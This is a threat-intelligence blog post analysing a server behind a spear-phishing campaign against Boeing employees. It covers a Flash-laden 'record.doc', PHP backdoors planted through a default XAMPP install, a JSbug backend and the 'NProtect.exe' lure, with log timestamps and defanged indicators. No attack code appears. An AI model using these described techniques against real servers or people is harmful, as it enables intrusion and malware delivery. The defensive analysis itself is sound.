By searching on urlQuery, you can find a submission, the 5 February, with this IP. And suprise this submission is regarding a “record.doc” document located in a “/adp/” directory. So we have the ADP word document. Also urlQuery is reporting an alert “FILE-OFFICE Microsoft Office Word with embedded Flash file transfer” regarding the “record.doc” document.
Now let analyze further this server used in the spear phishing campaign. By doing some researches on Google, you will quickly find that weak tools are present on the server and that these tools are freely accessible from Internet…. After some further analysis, we can find that an old default XAMPP installation is present on this server, and that bad guys have use this weakness in order to install PHP backdoor. The PHP backdoor were also not protected giving full access to the server.
The related “/adp/” directory is empty of the “record.doc” file and most of the server seem to have been cleaned.
But, I discovered an interesting “/jobs/” directory containing a well-known tool, JSbug statistics backend, used in previous drive-by attacks campaign. The contents of the backend allow us to see that a campaign was started since the 22 January by using www.boeing-job[.]com domain name.
Also, what is interesting, is that the XAMPP Apache log files were accessible from Internet, without restrictions.
By doing some log analysis we can find the following information’s:
- “record.doc” file size was 563200 bytes.
- First, 200 Apache return code, access to “/adp/record.doc” file was recorded the 05/Feb/2013:07:12:24 -0300.
- “/adp/record.doc” file was removed from the server around the 08/Feb/2013 09:23:24 -0300.
- Around 300 accesses on the “record.doc” files were done during this timeframe. 42 the 5 February, 7 the 6 February, 89 the 7 February and 161 the 8 February.
- A PHP backdoor was present on the server since the 05/Nov/2012 and used multiple times.
- A second PHP backdoor was uploaded on the server the 8 February, at 08/Feb/2013 02:25:25 -0300 (surely used to remove the record.doc file). Why not using the first PHP backdoor ? Surely cause you are not the guy who has deposit the “record.doc” file and you don’t know the existence of the first PHP backdoor.
- The server was scanned during two days with Acunetix, starting the 02/Feb/2013 18:25:45 -0300
Additional analysis of the discovered “/jobs/” and JSbug backend directory provide the following interesting information’s:
- The “/jobs/” directory was first seen the 22/Jan/2013 06:12:44 -0300
- Installation of JSBug backend was done the 22/Jan/2013 06:13:16 -0300
- Additional files were installed in the “/jobs/” directory like “img/jquery-1.8.3.min.js“, “img/logo.gif“, “check.php”, “download.htm“, “download.php“, “img/download.css“, “img/ff_step1.png“, “img/ie_step3.png“, “img/ff_step2.png” and “NProtect.exe“. “check.php“, “download.htm“, “NProtect.exe” and “download.php” are no more present on the server.
By analysing the file remaining on the server, and used in a previous attack, who has start the 22 January, we can see the following files who reveal that a spear phishing campaign was done against Boeing employees, in order to trick them to install the “NProtect.exe” malware.
logo file founded on the server
Step 1 for NProtect.exe installation
Step 2 for NProtect.exe installation
Step 3 for NProtect.exe installation
Recent Comments